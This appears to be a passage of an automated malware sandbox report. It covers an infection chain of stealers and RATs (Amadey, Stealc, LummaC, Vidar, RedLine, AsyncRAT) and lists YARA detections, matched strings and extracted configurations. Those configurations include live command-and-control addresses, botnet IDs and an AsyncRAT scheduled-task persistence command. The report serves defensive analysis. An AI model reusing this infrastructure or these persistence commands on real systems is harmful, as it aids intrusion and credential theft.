dfd80aba08.exe (PID: 5888 cmdline: "C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe" MD5: E6B7110E2C6E144296651B80F9B92A47)

ae70ca0159.exe (PID: 7160 cmdline: "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe" MD5: ADB822A9A629882B5444563CF0B010DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["cozyhomevpibes.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "FATE99--test"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: AsyncRAT

{"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\b6V4Rod[1].ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1072568001\88823343d6.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa02f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x15437:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb388:$a2: Stub.exe 0xb418:$a2: Stub.exe 0x16790:$a2: Stub.exe 0x16820:$a2: Stub.exe 0x6e4d:$a3: get_ActivatePong 0x12255:$a3: get_ActivatePong 0xa247:$a4: vmware 0x1564f:$a4: vmware 0xa0bf:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x154c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7b9c:$a6: get_SslClient 0x12fa4:$a6: get_SslClient
00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa0c1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x154c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x8db7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x141bf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xa110:$a2: Stub.exe 0xa1a0:$a2: Stub.exe 0x15518:$a2: Stub.exe 0x155a8:$a2: Stub.exe 0x5bd5:$a3: get_ActivatePong 0x10fdd:$a3: get_ActivatePong 0x8fcf:$a4: vmware 0x143d7:$a4: vmware 0x8e47:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1424f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x6924:$a6: get_SslClient 0x11d2c:$a6: get_SslClient
00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8e49:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14251:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.2548165139.0000000001001000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000002.2561414607.0000000000413000.00000040.00000001.01000000.00000014.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000026.00000003.2566196660.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.1778240987.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000007.00000003.2328083508.0000000001589000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x8b97:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9ef0:$a2: Stub.exe 0x9f80:$a2: Stub.exe 0x59b5:$a3: get_ActivatePong 0x8daf:$a4: vmware 0x8c27:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x6704:$a6: get_SslClient
00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8c29:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000008.00000003.2288787016.00000000056B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.1791230445.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9437:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xa790:$a2: Stub.exe 0xa820:$a2: Stub.exe 0x6255:$a3: get_ActivatePong 0x964f:$a4: vmware 0x94c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x6fa4:$a6: get_SslClient
00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x94c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa02f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb388:$a2: Stub.exe 0xb418:$a2: Stub.exe 0x6e4d:$a3: get_ActivatePong 0xa247:$a4: vmware 0xa0bf:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7b9c:$a6: get_SslClient
00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa0c1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000003.2310873047.0000000001589000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9dcf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb128:$a2: Stub.exe 0xb1b8:$a2: Stub.exe 0x6bed:$a3: get_ActivatePong 0x9fe7:$a4: vmware 0x9e5f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x793c:$a6: get_SslClient
00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9e61:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000038.00000002.3022837158.0000000000413000.00000040.00000001.01000000.0000001D.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001F.00000003.2435867329.0000000005510000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000026.00000002.2639679163.0000000000111000.00000040.00000001.01000000.00000016.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.2336403037.0000000001001000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa2d1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x149b1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1f091:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000002A.00000003.2626428387.0000000005550000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8e49:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9dc1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000039.00000002.3061697464.0000000000413000.00000040.00000001.01000000.0000001E.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000029.00000002.2681093884.0000000000B61000.00000040.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa237:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xcd90:$a2: Stub.exe 0xce20:$a2: Stub.exe 0x7055:$a3: get_ActivatePong 0xa44f:$a4: vmware 0xa2c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7da4:$a6: get_SslClient
00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa2c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000003.2308505301.0000000001589000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002A.00000002.2826217416.0000000001001000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: dfd80aba08.exe PID: 3164	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: dfd80aba08.exe PID: 3164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dfd80aba08.exe PID: 3164	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ae70ca0159.exe PID: 7396	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ae70ca0159.exe PID: 7396	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Macromedia.com PID: 3300	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Macromedia.com PID: 3300	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x5ca4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xdbd7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x84a06:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xaba56:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xb1a5e:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xd822b:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xe2afc:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xedfc7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xee324:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xfc615:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: ae70ca0159.exe PID: 1516	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ae70ca0159.exe PID: 1516	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: dfd80aba08.exe PID: 5888	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: dfd80aba08.exe PID: 5888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dfd80aba08.exe PID: 5888	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: loqVSeJ.exe PID: 2692	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: loqVSeJ.exe PID: 2692	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: loqVSeJ.exe PID: 2692	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x12e60:$a4: get_ScannedWallets 0x11d07:$a5: get_ScanTelegram 0x12ae9:$a6: get_ScanGeckoBrowsersPaths 0x1099a:$a7: <Processes>k__BackingField 0xdecd:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x102ce:$a9: <ScanFTP>k__BackingField
Process Memory Space: PAL947G2R107U02V5ZPL.exe PID: 2084	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: PAL947G2R107U02V5ZPL.exe PID: 2084	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: powershell.exe PID: 2916	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3a663f:$b1: ::WriteAllBytes( 0x81117:$b2: ::FromBase64String( 0x259ee2:$b2: ::FromBase64String( 0x3a65f1:$b2: ::FromBase64String( 0x142fa:$s1: -join 0x16a26:$s1: -join 0x1136aa:$s1: -join 0x46b6aa:$s1: -join 0x47877f:$s1: -join 0x47bb51:$s1: -join 0x47c203:$s1: -join 0x47dcf4:$s1: -join 0x47fefa:$s1: -join 0x480721:$s1: -join 0x480f91:$s1: -join 0x4816cc:$s1: -join 0x4816fe:$s1: -join 0x481746:$s1: -join 0x481765:$s1: -join 0x481fb5:$s1: -join 0x482131:$s1: -join
Process Memory Space: ae70ca0159.exe PID: 7160	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ae70ca0159.exe PID: 7160	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Bjkm5hE.exe PID: 6380	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Bjkm5hE.exe PID: 6380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7fOMOTQ.exe PID: 1196	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 7fOMOTQ.exe PID: 1196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7fOMOTQ.exe PID: 1196	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 78 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
22.3.Macromedia.com.36a8750.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
22.3.Macromedia.com.36a8750.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7adf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48fd:$a3: get_ActivatePong 0x7cf7:$a4: vmware 0x7b6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x564c:$a6: get_SslClient
22.3.Macromedia.com.36a8750.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x48fd:$str01: get_ActivatePong 0x564c:$str02: get_SslClient 0x5668:$str03: get_TcpClient 0x3f13:$str04: get_SendSync 0x3f63:$str05: get_IsConnected 0x4692:$str06: set_UseShellExecute 0x7e15:$str07: Pastebin 0x7e97:$str08: Select * from AntivirusProduct 0x8e38:$str09: Stub.exe 0x8ec8:$str09: Stub.exe 0x7bef:$str10: timeout 3 > NUL 0x7adf:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x7b6f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
22.3.Macromedia.com.36a8750.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7b71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
22.3.Macromedia.com.36a8750.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
22.3.Macromedia.com.36a8750.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7adf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48fd:$a3: get_ActivatePong 0x7cf7:$a4: vmware 0x7b6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x564c:$a6: get_SslClient
22.3.Macromedia.com.36a8750.1.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x48fd:$str01: get_ActivatePong 0x564c:$str02: get_SslClient 0x5668:$str03: get_TcpClient 0x3f13:$str04: get_SendSync 0x3f63:$str05: get_IsConnected 0x4692:$str06: set_UseShellExecute 0x7e15:$str07: Pastebin 0x7e97:$str08: Select * from AntivirusProduct 0x8e38:$str09: Stub.exe 0x8ec8:$str09: Stub.exe 0x7bef:$str10: timeout 3 > NUL 0x7adf:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x7b6f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
22.3.Macromedia.com.36a8750.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7b71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
21.2.e2b0a87ceb.exe.3ef9550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.0.e2b0a87ceb.exe.ba0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
22.3.Macromedia.com.36a8750.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
22.3.Macromedia.com.36a8750.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x98df:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x66fd:$a3: get_ActivatePong 0x9af7:$a4: vmware 0x996f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x744c:$a6: get_SslClient
22.3.Macromedia.com.36a8750.1.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x66fd:$str01: get_ActivatePong 0x744c:$str02: get_SslClient 0x7468:$str03: get_TcpClient 0x5d13:$str04: get_SendSync 0x5d63:$str05: get_IsConnected 0x6492:$str06: set_UseShellExecute 0x9c15:$str07: Pastebin 0x9c97:$str08: Select * from AntivirusProduct 0xac38:$str09: Stub.exe 0xacc8:$str09: Stub.exe 0x99ef:$str10: timeout 3 > NUL 0x98df:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x996f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
22.3.Macromedia.com.36a8750.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9971:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
22.3.Macromedia.com.36a8750.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
